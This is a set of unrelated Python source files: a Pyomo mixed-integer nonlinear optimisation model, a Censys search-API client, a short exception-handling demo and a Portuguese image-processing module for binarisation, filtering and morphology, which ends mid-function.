m.obj = Objective(expr=592*exp(0.65*m.x1 + m.x41 + m.x49) + 582*exp(0.59*m.x2 + m.x42 + m.x50) + 1200*exp(0.52*m.x3 +
m.x43 + m.x51) + 200*exp(0.7*m.x4 + m.x44 + m.x52) + 582*exp(0.39*m.x5 + m.x45 + m.x53) + 850*
exp(0.8*m.x6 + m.x46 + m.x54) + 592*exp(0.65*m.x7 + m.x47 + m.x55) + 1200*exp(0.52*m.x8 + m.x48
+ m.x56) + 150*exp(0.5*m.x58), sense=minimize)
m.c1 = Constraint(expr= m.x1 - m.x9 + m.x41 >= 0.993251773010283)
m.c2 = Constraint(expr= m.x2 - m.x10 + m.x42 >= 0.336472236621213)
m.c3 = Constraint(expr= m.x3 - m.x11 + m.x43 >= 0.182321556793955)
m.c4 = Constraint(expr= m.x4 - m.x12 + m.x44 >= 0.53062825106217)
m.c5 = Constraint(expr= m.x5 - m.x13 + m.x45 >= 0.741937344729377)
m.c6 = Constraint(expr= m.x6 - m.x14 + m.x46 >= 1.09861228866811)
m.c7 = Constraint(expr= m.x7 - m.x15 + m.x47 >= 0.587786664902119)
m.c8 = Constraint(expr= m.x8 - m.x16 + m.x48 >= 0.8754687373539)
m.c9 = Constraint(expr= m.x1 - m.x17 + m.x41 >= 0.587786664902119)
m.c10 = Constraint(expr= m.x2 - m.x18 + m.x42 >= 0.0953101798043249)
m.c11 = Constraint(expr= m.x3 - m.x19 + m.x43 >= 0.741937344729377)
m.c12 = Constraint(expr= m.x4 - m.x20 + m.x44 >= 0.78845736036427)
m.c13 = Constraint(expr= m.x5 - m.x21 + m.x45 >= 1.09861228866811)
m.c14 = Constraint(expr= m.x6 - m.x22 + m.x46 >= 1.1314021114911)
m.c15 = Constraint(expr= m.x7 - m.x23 + m.x47 >= 0.8754687373539)
m.c16 = Constraint(expr= m.x8 - m.x24 + m.x48 >= 1.16315080980568)
m.c17 = Constraint(expr= m.x1 - m.x25 + m.x41 >= 1.16315080980568)
m.c18 = Constraint(expr= m.x2 - m.x26 + m.x42 >= 0.0953101798043249)
m.c19 = Constraint(expr= m.x3 - m.x27 + m.x43 >= 0.182321556793955)
m.c20 = Constraint(expr= m.x4 - m.x28 + m.x44 >= -0.105360515657826)
m.c21 = Constraint(expr= m.x5 - m.x29 + m.x45 >= 0.262364264467491)
m.c22 = Constraint(expr= m.x6 - m.x30 + m.x46 >= 0.8754687373539)
m.c23 = Constraint(expr= m.x7 - m.x31 + m.x47 >= 0.916290731874155)
m.c24 = Constraint(expr= m.x8 - m.x32 + m.x48 >= -0.105360515657826)
m.c25 = Constraint(expr= m.x1 - m.x33 + m.x41 >= 1.1314021114911)
m.c26 = Constraint(expr= m.x2 - m.x34 + m.x42 >= 1.38629436111989)
m.c27 = Constraint(expr= m.x3 - m.x35 + m.x43 >= 1.16315080980568)
m.c28 = Constraint(expr= m.x4 - m.x36 + m.x44 >= 0.182321556793955)
m.c29 = Constraint(expr= m.x5 - m.x37 + m.x45 >= 0.8754687373539)
m.c30 = Constraint(expr= m.x6 - m.x38 + m.x46 >= 0.993251773010283)
m.c31 = Constraint(expr= m.x7 - m.x39 + m.x47 >= 1.06471073699243)
m.c32 = Constraint(expr= m.x8 - m.x40 + m.x48 >= 1.1314021114911)
m.c33 = Constraint(expr= m.x9 + m.x49 + m.x59 >= 1.09861228866811)
m.c34 = Constraint(expr= m.x10 + m.x50 + m.x59 >= 0.693147180559945)
m.c35 = Constraint(expr= m.x11 + m.x51 + m.x59 >= 0.693147180559945)
m.c36 = Constraint(expr= m.x12 + m.x52 + m.x59 >= 0)
m.c37 = Constraint(expr= m.x13 + m.x53 + m.x59 >= 1.38629436111989)
m.c38 = Constraint(expr= m.x14 + m.x54 + m.x59 >= 0)
m.c39 = Constraint(expr= m.x15 + m.x55 + m.x59 >= 1.09861228866811)
m.c40 = Constraint(expr= m.x16 + m.x56 + m.x59 >= 0.693147180559945)
m.c41 = Constraint(expr= m.x17 + m.x49 + m.x60 >= 0.693147180559945)
m.c42 = Constraint(expr= m.x18 + m.x50 + m.x60 >= 1.38629436111989)
m.c43 = Constraint(expr= m.x19 + m.x51 + m.x60 >= 0)
m.c44 = Constraint(expr= m.x20 + m.x52 + m.x60 >= 1.09861228866811)
m.c45 = Constraint(expr= m.x21 + m.x53 + m.x60 >= 1.6094379124341)
m.c46 = Constraint(expr= m.x22 + m.x54 + m.x60 >= 0.693147180559945)
m.c47 = Constraint(expr= m.x23 + m.x55 + m.x60 >= 1.38629436111989)
m.c48 = Constraint(expr= m.x24 + m.x56 + m.x60 >= 1.79175946922805)
m.c49 = Constraint(expr= m.x25 + m.x49 + m.x61 >= 1.79175946922805)
m.c50 = Constraint(expr= m.x26 + m.x50 + m.x61 >= 0.693147180559945)
m.c51 = Constraint(expr= m.x27 + m.x51 + m.x61 >= 0.693147180559945)
m.c52 = Constraint(expr= m.x28 + m.x52 + m.x61 >= 0.693147180559945)
m.c53 = Constraint(expr= m.x29 + m.x53 + m.x61 >= 1.09861228866811)
m.c54 = Constraint(expr= m.x30 + m.x54 + m.x61 >= 1.6094379124341)
m.c55 = Constraint(expr= m.x31 + m.x55 + m.x61 >= 0.693147180559945)
m.c56 = Constraint(expr= m.x32 + m.x56 + m.x61 >= 1.38629436111989)
m.c57 = Constraint(expr= m.x33 + m.x49 + m.x62 >= 0.693147180559945)
m.c58 = Constraint(expr= m.x34 + m.x50 + m.x62 >= 1.09861228866811)
m.c59 = Constraint(expr= m.x35 + m.x51 + m.x62 >= 1.79175946922805)
m.c60 = Constraint(expr= m.x36 + m.x52 + m.x62 >= 1.6094379124341)
m.c61 = Constraint(expr= m.x37 + m.x53 + m.x62 >= 1.38629436111989)
m.c62 = Constraint(expr= m.x38 + m.x54 + m.x62 >= 0.693147180559945)
m.c63 = Constraint(expr= m.x39 + m.x55 + m.x62 >= 0.693147180559945)
m.c64 = Constraint(expr= m.x40 + m.x56 + m.x62 >= 1.09861228866811)
m.c65 = Constraint(expr=30000*exp(m.x59) + 20000*exp(m.x60) + 40000*exp(m.x61) + 20000*exp(m.x62) <= 6000)
m.c66 = Constraint(expr= - m.x10 + m.x58 - 10*m.b127 >= -8.61370563888011)
m.c67 = Constraint(expr= - m.x11 + m.x58 - 10*m.b128 >= -8.61370563888011)
m.c68 = Constraint(expr= - m.x12 + m.x58 - 10*m.b129 >= -8.61370563888011)
m.c69 = Constraint(expr= - m.x13 + m.x58 - 10*m.b130 >= -8.61370563888011)
m.c70 = Constraint(expr= - m.x14 + m.x58 - 10*m.b131 >= -8.61370563888011)
m.c71 = Constraint(expr= - m.x15 + m.x58 - 10*m.b132 >= -8.61370563888011)
m.c72 = Constraint(expr= - m.x16 + m.x58 - 10*m.b133 >= -8.61370563888011)
m.c73 = Constraint(expr= - m.x18 + m.x58 - 10*m.b134 >= -8.61370563888011)
m.c74 = Constraint(expr= - m.x19 + m.x58 - 10*m.b135 >= -8.61370563888011)
m.c75 = Constraint(expr= - m.x20 + m.x58 - 10*m.b136 >= -8.61370563888011)
m.c76 = Constraint(expr= - m.x21 + m.x58 - 10*m.b137 >= -8.61370563888011)
m.c77 = Constraint(expr= - m.x22 + m.x58 - 10*m.b138 >= -8.61370563888011)
m.c78 = Constraint(expr= - m.x23 + m.x58 - 10*m.b139 >= -8.61370563888011)
m.c79 = Constraint(expr= - m.x24 + m.x58 - 10*m.b140 >= -8.61370563888011)
m.c80 = Constraint(expr= - m.x26 + m.x58 - 10*m.b141 >= -8.61370563888011)
m.c81 = Constraint(expr= - m.x27 + m.x58 - 10*m.b142 >= -8.61370563888011)
m.c82 = Constraint(expr= - m.x28 + m.x58 - 10*m.b143 >= -8.61370563888011)
m.c83 = Constraint(expr= - m.x29 + m.x58 - 10*m.b144 >= -8.61370563888011)
m.c84 = Constraint(expr= - m.x30 + m.x58 - 10*m.b145 >= -8.61370563888011)
m.c85 = Constraint(expr= - m.x31 + m.x58 - 10*m.b146 >= -8.61370563888011)
m.c86 = Constraint(expr= - m.x32 + m.x58 - 10*m.b147 >= -8.61370563888011)
m.c87 = Constraint(expr= - m.x34 + m.x58 - 10*m.b148 >= -8.61370563888011)
m.c88 = Constraint(expr= - m.x35 + m.x58 - 10*m.b149 >= -8.61370563888011)
m.c89 = Constraint(expr= - m.x36 + m.x58 - 10*m.b150 >= -8.61370563888011)
m.c90 = Constraint(expr= - m.x37 + m.x58 - 10*m.b151 >= -8.61370563888011)
m.c91 = Constraint(expr= - m.x38 + m.x58 - 10*m.b152 >= -8.61370563888011)
m.c92 = Constraint(expr= - m.x39 + m.x58 - 10*m.b153 >= -8.61370563888011)
m.c93 = Constraint(expr= - m.x40 + m.x58 - 10*m.b154 >= -8.61370563888011)
m.c94 = Constraint(expr= - m.x9 + m.x58 - 10*m.b127 >= -8.61370563888011)
m.c95 = Constraint(expr= - m.x10 + m.x58 - 10*m.b128 >= -8.61370563888011)
m.c96 = Constraint(expr= - m.x11 + m.x58 - 10*m.b129 >= -8.61370563888011)
m.c97 = Constraint(expr= - m.x12 + m.x58 - 10*m.b130 >= -8.61370563888011)
m.c98 = Constraint(expr= - m.x13 + m.x58 - 10*m.b131 >= -8.61370563888011)
m.c99 = Constraint(expr= - m.x14 + m.x58 - 10*m.b132 >= -8.61370563888011)
m.c100 = Constraint(expr= - m.x15 + m.x58 - 10*m.b133 >= -8.61370563888011)
m.c101 = Constraint(expr= - m.x17 + m.x58 - 10*m.b134 >= -8.61370563888011)
m.c102 = Constraint(expr= - m.x18 + m.x58 - 10*m.b135 >= -8.61370563888011)
m.c103 = Constraint(expr= - m.x19 + m.x58 - 10*m.b136 >= -8.61370563888011)
m.c104 = Constraint(expr= - m.x20 + m.x58 - 10*m.b137 >= -8.61370563888011)
m.c105 = Constraint(expr= - m.x21 + m.x58 - 10*m.b138 >= -8.61370563888011)
m.c106 = Constraint(expr= - m.x22 + m.x58 - 10*m.b139 >= -8.61370563888011)
m.c107 = Constraint(expr= - m.x23 + m.x58 - 10*m.b140 >= -8.61370563888011)
m.c108 = Constraint(expr= - m.x25 + m.x58 - 10*m.b141 >= -8.61370563888011)
m.c109 = Constraint(expr= - m.x26 + m.x58 - 10*m.b142 >= -8.61370563888011)
m.c110 = Constraint(expr= - m.x27 + m.x58 - 10*m.b143 >= -8.61370563888011)
m.c111 = Constraint(expr= - m.x28 + m.x58 - 10*m.b144 >= -8.61370563888011)
m.c112 = Constraint(expr= - m.x29 + m.x58 - 10*m.b145 >= -8.61370563888011)
m.c113 = Constraint(expr= - m.x30 + m.x58 - 10*m.b146 >= -8.61370563888011)
m.c114 = Constraint(expr= - m.x31 + m.x58 - 10*m.b147 >= -8.61370563888011)
m.c115 = Constraint(expr= - m.x33 + m.x58 - 10*m.b148 >= -8.61370563888011)
m.c116 = Constraint(expr= - m.x34 + m.x58 - 10*m.b149 >= -8.61370563888011)
m.c117 = Constraint(expr= - m.x35 + m.x58 - 10*m.b150 >= -8.61370563888011)
m.c118 = Constraint(expr= - m.x36 + m.x58 - 10*m.b151 >= -8.61370563888011)
m.c119 = Constraint(expr= - m.x37 + m.x58 - 10*m.b152 >= -8.61370563888011)
m.c120 = Constraint(expr= - m.x38 + m.x58 - 10*m.b153 >= -8.61370563888011)
m.c121 = Constraint(expr= - m.x39 + m.x58 - 10*m.b154 >= -8.61370563888011)
m.c122 = Constraint(expr= m.x41 - 0.693147180559945*m.b71 - 1.09861228866811*m.b79 - 1.38629436111989*m.b87 == 0)
m.c123 = Constraint(expr= m.x42 - 0.693147180559945*m.b72 - 1.09861228866811*m.b80 - 1.38629436111989*m.b88 == 0)
m.c124 = Constraint(expr= m.x43 - 0.693147180559945*m.b73 - 1.09861228866811*m.b81 - 1.38629436111989*m.b89 == 0)
m.c125 = Constraint(expr= m.x44 - 0.693147180559945*m.b74 - 1.09861228866811*m.b82 - 1.38629436111989*m.b90 == 0)
m.c126 = Constraint(expr= m.x45 - 0.693147180559945*m.b75 - 1.09861228866811*m.b83 - 1.38629436111989*m.b91 == 0)
m.c127 = Constraint(expr= m.x46 - 0.693147180559945*m.b76 - 1.09861228866811*m.b84 - 1.38629436111989*m.b92 == 0)
m.c128 = Constraint(expr= m.x47 - 0.693147180559945*m.b77 - 1.09861228866811*m.b85 - 1.38629436111989*m.b93 == 0)
m.c129 = Constraint(expr= m.x48 - 0.693147180559945*m.b78 - 1.09861228866811*m.b86 - 1.38629436111989*m.b94 == 0)
m.c130 = Constraint(expr= m.x49 - 0.693147180559945*m.b103 - 1.09861228866811*m.b111 - 1.38629436111989*m.b119 == 0)
m.c131 = Constraint(expr= m.x50 - 0.693147180559945*m.b104 - 1.09861228866811*m.b112 - 1.38629436111989*m.b120 == 0)
m.c132 = Constraint(expr= m.x51 - 0.693147180559945*m.b105 - 1.09861228866811*m.b113 - 1.38629436111989*m.b121 == 0)
m.c133 = Constraint(expr= m.x52 - 0.693147180559945*m.b106 - 1.09861228866811*m.b114 - 1.38629436111989*m.b122 == 0)
m.c134 = Constraint(expr= m.x53 - 0.693147180559945*m.b107 - 1.09861228866811*m.b115 - 1.38629436111989*m.b123 == 0)
m.c135 = Constraint(expr= m.x54 - 0.693147180559945*m.b108 - 1.09861228866811*m.b116 - 1.38629436111989*m.b124 == 0)
m.c136 = Constraint(expr= m.x55 - 0.693147180559945*m.b109 - 1.09861228866811*m.b117 - 1.38629436111989*m.b125 == 0)
m.c137 = Constraint(expr= m.x56 - 0.693147180559945*m.b110 - 1.09861228866811*m.b118 - 1.38629436111989*m.b126 == 0)
m.c138 = Constraint(expr= m.b63 + m.b71 + m.b79 + m.b87 == 1)
m.c139 = Constraint(expr= m.b64 + m.b72 + m.b80 + m.b88 == 1)
m.c140 = Constraint(expr= m.b65 + m.b73 + m.b81 + m.b89 == 1)
m.c141 = Constraint(expr= m.b66 + m.b74 + m.b82 + m.b90 == 1)
m.c142 = Constraint(expr= m.b67 + m.b75 + m.b83 + m.b91 == 1)
m.c143 = Constraint(expr= m.b68 + m.b76 + m.b84 + m.b92 == 1)
m.c144 = Constraint(expr= m.b69 + m.b77 + m.b85 + m.b93 == 1)
m.c145 = Constraint(expr= m.b70 + m.b78 + m.b86 + m.b94 == 1)
m.c146 = Constraint(expr= m.b95 + m.b103 + m.b111 + m.b119 == 1)
m.c147 = Constraint(expr= m.b96 + m.b104 + m.b112 + m.b120 == 1)
m.c148 = Constraint(expr= m.b97 + m.b105 + m.b113 + m.b121 == 1)
m.c149 = Constraint(expr= m.b98 + m.b106 + m.b114 + m.b122 == 1)
m.c150 = Constraint(expr= m.b99 + m.b107 + m.b115 + m.b123 == 1)
m.c151 = Constraint(expr= m.b100 + m.b108 + m.b116 + m.b124 == 1)
m.c152 = Constraint(expr= m.b101 + m.b109 + m.b117 + m.b125 == 1)
m.c153 = Constraint(expr= m.b102 + m.b110 + m.b118 + m.b126 == 1)
m.c154 = Constraint(expr= m.b127 + m.b128 + m.b129 + m.b130 + m.b131 + m.b132 + m.b133 <= 1)
m.c155 = Constraint(expr= m.b134 + m.b135 + m.b136 + m.b137 + m.b138 + m.b139 + m.b140 <= 1)
m.c156 = Constraint(expr= m.b141 + m.b142 + m.b143 + m.b144 + m.b145 + m.b146 + m.b147 <= 1)
m.c157 = Constraint(expr= m.b148 + m.b149 + m.b150 + m.b151 + m.b152 + m.b153 + m.b154 <= 1)
m.c158 = Constraint(expr= m.b127 + m.b128 + m.b129 + m.b130 + m.b131 + m.b132 + m.b133 + m.b134 + m.b135 + m.b136
+ m.b137 + m.b138 + m.b139 + m.b140 + m.b141 + m.b142 + m.b143 + m.b144 + m.b145 + m.b146
+ m.b147 + m.b148 + m.b149 + m.b150 + m.b151 + m.b152 + m.b153 + m.b154 >= 1)
m.c159 = Constraint(expr= m.x9 - m.x10 - 0.693147180559945*m.b127 <= 0)
m.c160 = Constraint(expr= m.x10 - m.x11 - 0.693147180559945*m.b128 <= 0)
m.c161 = Constraint(expr= m.x11 - m.x12 - 0.693147180559945*m.b129 <= 0)
m.c162 = Constraint(expr= m.x12 - m.x13 - 0.693147180559945*m.b130 <= 0)
m.c163 = Constraint(expr= m.x13 - m.x14 - 0.693147180559945*m.b131 <= 0)
m.c164 = Constraint(expr= m.x14 - m.x15 - 0.693147180559945*m.b132 <= 0)
m.c165 = Constraint(expr= m.x15 - m.x16 - 0.693147180559945*m.b133 <= 0)
m.c166 = Constraint(expr= m.x17 - m.x18 - 0.693147180559945*m.b134 <= 0)
m.c167 = Constraint(expr= m.x18 - m.x19 - 0.693147180559945*m.b135 <= 0)
m.c168 = Constraint(expr= m.x19 - m.x20 - 0.693147180559945*m.b136 <= 0)
m.c169 = Constraint(expr= m.x20 - m.x21 - 0.693147180559945*m.b137 <= 0)
m.c170 = Constraint(expr= m.x21 - m.x22 - 0.693147180559945*m.b138 <= 0)
m.c171 = Constraint(expr= m.x22 - m.x23 - 0.693147180559945*m.b139 <= 0)
m.c172 = Constraint(expr= m.x23 - m.x24 - 0.693147180559945*m.b140 <= 0)
m.c173 = Constraint(expr= m.x25 - m.x26 - 0.693147180559945*m.b141 <= 0)
m.c174 = Constraint(expr= m.x26 - m.x27 - 0.693147180559945*m.b142 <= 0)
m.c175 = Constraint(expr= m.x27 - m.x28 - 0.693147180559945*m.b143 <= 0)
m.c176 = Constraint(expr= m.x28 - m.x29 - 0.693147180559945*m.b144 <= 0)
m.c177 = Constraint(expr= m.x29 - m.x30 - 0.693147180559945*m.b145 <= 0)
m.c178 = Constraint(expr= m.x30 - m.x31 - 0.693147180559945*m.b146 <= 0)
m.c179 = Constraint(expr= m.x31 - m.x32 - 0.693147180559945*m.b147 <= 0)
m.c180 = Constraint(expr= m.x33 - m.x34 - 0.693147180559945*m.b148 <= 0)
m.c181 = Constraint(expr= m.x34 - m.x35 - 0.693147180559945*m.b149 <= 0)
m.c182 = Constraint(expr= m.x35 - m.x36 - 0.693147180559945*m.b150 <= 0)
m.c183 = Constraint(expr= m.x36 - m.x37 - 0.693147180559945*m.b151 <= 0)
m.c184 = Constraint(expr= m.x37 - m.x38 - 0.693147180559945*m.b152 <= 0)
m.c185 = Constraint(expr= m.x38 - m.x39 - 0.693147180559945*m.b153 <= 0)
m.c186 = Constraint(expr= m.x39 - m.x40 - 0.693147180559945*m.b154 <= 0)
m.c187 = Constraint(expr= m.x9 - m.x10 + 0.693147180559945*m.b127 >= 0)
m.c188 = Constraint(expr= m.x10 - m.x11 + 0.693147180559945*m.b128 >= 0)
m.c189 = Constraint(expr= m.x11 - m.x12 + 0.693147180559945*m.b129 >= 0)
m.c190 = Constraint(expr= m.x12 - m.x13 + 0.693147180559945*m.b130 >= 0)
m.c191 = Constraint(expr= m.x13 - m.x14 + 0.693147180559945*m.b131 >= 0)
m.c192 = Constraint(expr= m.x14 - m.x15 + 0.693147180559945*m.b132 >= 0)
m.c193 = Constraint(expr= m.x15 - m.x16 + 0.693147180559945*m.b133 >= 0)
m.c194 = Constraint(expr= m.x17 - m.x18 + 0.693147180559945*m.b134 >= 0)
m.c195 = Constraint(expr= m.x18 - m.x19 + 0.693147180559945*m.b135 >= 0)
m.c196 = Constraint(expr= m.x19 - m.x20 + 0.693147180559945*m.b136 >= 0)
m.c197 = Constraint(expr= m.x20 - m.x21 + 0.693147180559945*m.b137 >= 0)
m.c198 = Constraint(expr= m.x21 - m.x22 + 0.693147180559945*m.b138 >= 0)
m.c199 = Constraint(expr= m.x22 - m.x23 + 0.693147180559945*m.b139 >= 0)
m.c200 = Constraint(expr= m.x23 - m.x24 + 0.693147180559945*m.b140 >= 0)
m.c201 = Constraint(expr= m.x25 - m.x26 + 0.693147180559945*m.b141 >= 0)
m.c202 = Constraint(expr= m.x26 - m.x27 + 0.693147180559945*m.b142 >= 0)
m.c203 = Constraint(expr= m.x27 - m.x28 + 0.693147180559945*m.b143 >= 0)
m.c204 = Constraint(expr= m.x28 - m.x29 + 0.693147180559945*m.b144 >= 0)
m.c205 = Constraint(expr= m.x29 - m.x30 + 0.693147180559945*m.b145 >= 0)
m.c206 = Constraint(expr= m.x30 - m.x31 + 0.693147180559945*m.b146 >= 0)
m.c207 = Constraint(expr= m.x31 - m.x32 + 0.693147180559945*m.b147 >= 0)
m.c208 = Constraint(expr= m.x33 - m.x34 + 0.693147180559945*m.b148 >= 0)
m.c209 = Constraint(expr= m.x34 - m.x35 + 0.693147180559945*m.b149 >= 0)
m.c210 = Constraint(expr= m.x35 - m.x36 + 0.693147180559945*m.b150 >= 0)
m.c211 = Constraint(expr= m.x36 - m.x37 + 0.693147180559945*m.b151 >= 0)
m.c212 = Constraint(expr= m.x37 - m.x38 + 0.693147180559945*m.b152 >= 0)
m.c213 = Constraint(expr= m.x38 - m.x39 + 0.693147180559945*m.b153 >= 0)
m.c214 = Constraint(expr= m.x39 - m.x40 + 0.693147180559945*m.b154 >= 0)
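# --- Example (not part of the original model file) ---
# A minimal sketch of how this MINLP model could be solved with Pyomo,
# assuming a suitable solver such as 'bonmin' or 'couenne' is installed
# and available on the PATH:
#
# from pyomo.environ import SolverFactory, value
# results = SolverFactory('bonmin').solve(m, tee=True)
# print(results.solver.termination_condition)
# print('objective value:', value(m.obj))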
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from searchengine import searchengine
import requests
class censys(searchengine):
def __init__(self):
super(censys, self).__init__()
def censys_dork_search(self, uid, secret, dork, dorktype, page=1):
"""query information form censys with api.
uid: censys API ID.
secret: censys API secret.
dork: censys dork syntax.
dorktype: [certificates, ipv4, websites].
page: The page of the result set to be returned.
The number of pages in the result set is available under
metadata in any request. By default, the API will return
the first page of results. One indexed.
api doc: https://censys.io/api/v1/docs/search
"""
censys_api = 'https://www.censys.io/api/v1/search/{}'.format(dorktype)
query = {'query': dork, 'page': page}
return requests.post(censys_api, auth=(uid, secret), json=query)
    def parse_results(self, response):
        """Parse censys results into (status, results, metadata)."""
        assert response is not None
        json_response = response.json()
        assert json_response
        # An error response looks like:
        # {u'status': u'error',
        #  u'error_type': u'malformed_request',
        #  u'error': u'request is missing the required field query'}
        assert json_response['status'] == 'ok'
        status = json_response['status']
        results = json_response['results']
        # Example metadata: {u'count': 12948,
        #                    u'query': u'apache',
        #                    u'backend_time': 510,
        #                    u'page': 1,
        #                    u'pages': 130}
        metadata = json_response['metadata']
        return (status, results, metadata)
if __name__ == '__main__':
uid = raw_input('censys API ID: ')
secret = raw_input('censys secret: ')
dork = raw_input('censys dork: ')
dorktype = raw_input('censys dork type, [certificates, ipv4, websites]: ')
cs = censys()
response = cs.censys_dork_search(uid, secret, dork, dorktype)
status, results, metadata = cs.parse_results(response)
for _ in results:
print(_)
# Certificates Search:
# {u'parsed.fingerprint_sha256': [
# u'632aa7af6fed88218fbef0983823032093ef662b96c14574bb43da5bdb046f7e'
# ],
# u'parsed.subject_dn': [
# u'OU=Domain Control Validated, '
# 'OU=PositiveSSL Multi-Domain, '
# 'CN=sni191653.cloudflaressl.com'
# ],
# u'parsed.issuer_dn': [
# u'C=GB, ST=Greater Manchester, '
# 'L=Salford, '
# 'O=COMODO CA Limited, '
# 'CN=COMODO ECC Domain Validation Secure Server CA 2'
# ]}
# IPv4 Search
# {u'ip': u'xxx.xxx.xxx.xxx', u'protocols': [u'443/https']}
# Websites Search:
# {u'domain': u'demo.com', u'alexa_rank': [622]}
|
#!/usr/bin/env python3
def show():
try:
raise Exception("foo")
except Exception as e:
print("caught")
finally:
print("Finally")
try:
3 / 0
except ZeroDivisionError:
print("OK")
try:
raise Exception("foo")
except:
print("Got it")
if __name__ == "__main__":
show()
|
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 07 17:56:46 2016
@author: Arenhart
"""
import PIL.Image as pil
import PIL.ImageTk as imagetk
import numpy as np
import scipy.ndimage as sp
import matplotlib.pyplot as plt
import skimage as sk
import skimage.filters as filters
import skimage.morphology as morphology
import skimage.measure as measure
import skimage.feature as feature
import tkinter as tk
import tkinter.filedialog as filedialog
import os
MAX_WIDTH = 300
MAX_HEIGHT = 300
def plt_to_image():
i = 0
filename = 'temp'+str(i)+'.tif'
while filename in os.listdir(os.getcwd()):
i += 1
filename = 'temp'+str(i)+'.tif'
if i >= 1000: return None
plt.savefig(filename)
with open(filename, 'rb') as file:
image = pil.open(file)
img = image.copy()
image.close()
os.remove(filename)
return img
def carregar():
return pil.open(filedialog.askopenfilename())
def salvar(imagem):
save_name = filedialog.asksaveasfilename()
if save_name == '': return
try:
imagem.save(save_name)
except:
if '.' in save_name:
save_name = save_name[:save_name.find('.')] + '.bmp'
else:
save_name = save_name + '.bmp'
imagem.save(save_name)
def verificar_binaria(matriz):
    # True only when every non-zero pixel equals 255, i.e. the image is binary.
    mat = matriz > 0
    return np.sum(mat) * 255 == np.sum(matriz)
def vis(matriz):
return pil.fromarray(matriz)
def binarizar(matriz, limiar=None):
    # When no threshold is given, fall back to Otsu's method.
    if limiar is None:
        limiar = filters.threshold_otsu(matriz)
    return ((matriz >= limiar) * 255).astype('uint8')
def histograma(matriz, bins = 254):
plt.clf()
return plt.hist(matriz.flatten(),bins=bins)
def mapa_distancia(matriz_binarizada):
return sp.morphology.distance_transform_edt(matriz_binarizada)
def inverter(matriz):
return 255 - matriz
def expandir_contraste(matriz):
return sk.exposure.rescale_intensity(matriz)
def equalizar_histograma(matriz):
return (sk.exposure.equalize_hist(matriz)*255).astype('uint8')
def filtro_gaussiano(matriz,sigma):
return (filters.gaussian(matriz,
sigma=sigma)*255).astype('uint8')
def filtro_mediana(matriz,tamanho):
return filters.median(matriz,morphology.disk(tamanho))
def filtro_realce(matriz, tamanho=1):
return filters.rank.enhance_contrast(matriz,morphology.disk(tamanho))
def filtro_prewitt(matriz):
return (255-filters.prewitt(matriz)*255).astype('uint8')
def filtro_sobel(matriz):
return (255-filters.sobel(matriz)*255).astype('uint8')
def filtro_scharr(matriz):
return (255-filters.scharr(matriz)*255).astype('uint8')
def erosao(matriz_binaria,tamanho=1):
matriz_binaria = matriz_binaria//255
return (morphology.binary_erosion(
matriz_binaria,morphology.disk(tamanho))*255).astype('uint8')
def dilatacao(matriz_binaria,tamanho=1):
matriz_binaria = matriz_binaria//255
return (morphology.binary_dilation(
matriz_binaria,morphology.disk(tamanho))*255).astype('uint8')
def abertura(matriz_binaria,tamanho=1):
matriz_binaria = matriz_binaria//255
return (morphology.binary_opening(
matriz_binaria,morphology.disk(tamanho))*255).astype('uint8')
def fechamento(matriz_binaria,tamanho=1):
matriz_binaria = matriz_binaria//255
return (morphology.binary_closing(
matriz_binaria,morphology.disk(tamanho))*255).astype('uint8')
def granulometria(matriz_binaria):
area_inicial = matriz_binaria.sum()
menor_aresta = min(matriz_binaria.shape)
raio = [0]
area_cf = [0]
area = [0]
i = 1
while area_cf[-1] < 1 and i < menor_aresta and i < 50:
raio.append(i)
new_area = 1 - (abertura(matriz_binaria,i).sum()/area_inicial)
area.append(new_area-area_cf[-1])
area_cf.append(new_area)
i += 1
print(i)
plt.plot(raio,area,color='blue')
plt.plot(raio,area_cf,color='green')
def correlacao(matriz_binaria):
if not matriz_binaria.dtype == 'bool':
matriz_binaria = (matriz_binaria / matriz_binaria.max()).astype('uint8')
comprimento = min(matriz_binaria.shape)//2
correlacao_x = []
correlacao_y = []
correlacao_x.append(matriz_binaria.mean())
for i in range(1,comprimento):
correlacao_x.append(
( (matriz_binaria[0:-i,:] * matriz_binaria[i:,:]).sum() )
/ matriz_binaria[i:,:].size )
correlacao_y.append(matriz_binaria.mean())
for i in range(1,comprimento):
correlacao_y.append(
( (matriz_binaria[:,0:-i] * matriz_binaria[:,i:]).sum() )
/ matriz_binaria[:,i:].size )
correlacao_x = np.array(correlacao_x)
correlacao_y = np.array(correlacao_y)
correlacao = (correlacao_x + correlacao_y)/2
plt.plot(range(comprimento),correlacao_x,color='blue')
plt.plot(range(comprimento),correlacao_y,color='red')
plt.plot(range(comprimento),correlacao,color='green')
#plt.show()
return (correlacao_x, correlacao_y, correlacao)
def rotular(imagem_binaria):
return measure.label(imagem_binaria,background=0)
def rotular_colorido(matriz_binaria):
mat_rotulada = measure.label(matriz_binaria,background=0)
size = matriz_binaria.shape
mat = np.zeros((size[0],size[1],3),dtype = np.uint8)
max_index = mat_rotulada.max()
g_factor = int(max_index**(2/3))
r_factor = int(max_index**(1/3))
for i,j in [(i,j) for i in range(size[0]) for j in range(size[1])]:
index = mat_rotulada[i,j]
if index == 0:
mat[i,j,0], mat[i,j,1], mat[i,j,2] = 0, 0, 0
continue
b = 50 + int( 205 * (index / max_index) )
g = 50 + int( (index%g_factor) * (205/g_factor))
r = 50 + int( (index%r_factor) * (205/r_factor))
mat[i,j,0], mat[i,j,1], mat[i,j,2] = r,g,b
return mat
def conectividade(matriz_binaria):
matriz_binaria = rotular(matriz_binaria)
comprimento = range(min(matriz_binaria.shape)//2)
tamanho_total = matriz_binaria.shape[0]*matriz_binaria.shape[1]
conectividade_x = []
conectividade_y = []
matriz = matriz_binaria#.flatten()
    for i in comprimento:
        # cyclic shift along the rows, keeping the 2-D shape
        matriz_deslocada = np.roll(matriz, -i, axis=0)
        matriz_sobreposta = np.logical_and(matriz_deslocada == matriz, matriz != -1)
        conectividade_x.append(matriz_sobreposta.sum()/tamanho_total)
    #matriz = matriz_binaria.transpose().flatten()
    for i in comprimento:
        # cyclic shift along the columns
        matriz_deslocada = np.roll(matriz, -i, axis=1)
        matriz_sobreposta = np.logical_and(matriz_deslocada == matriz, matriz != -1)
        conectividade_y.append(matriz_sobreposta.sum()/tamanho_total)
conectividade = (np.array(conectividade_x) + np.array(conectividade_y))/2
plt.plot(comprimento,conectividade_x,color='blue')
plt.plot(comprimento,conectividade_y,color='red')
plt.plot(comprimento,conectividade,color='green')
#plt.show()
def propriedades(matriz_rotulada,bins=20):
prop = measure.regionprops(matriz_rotulada)
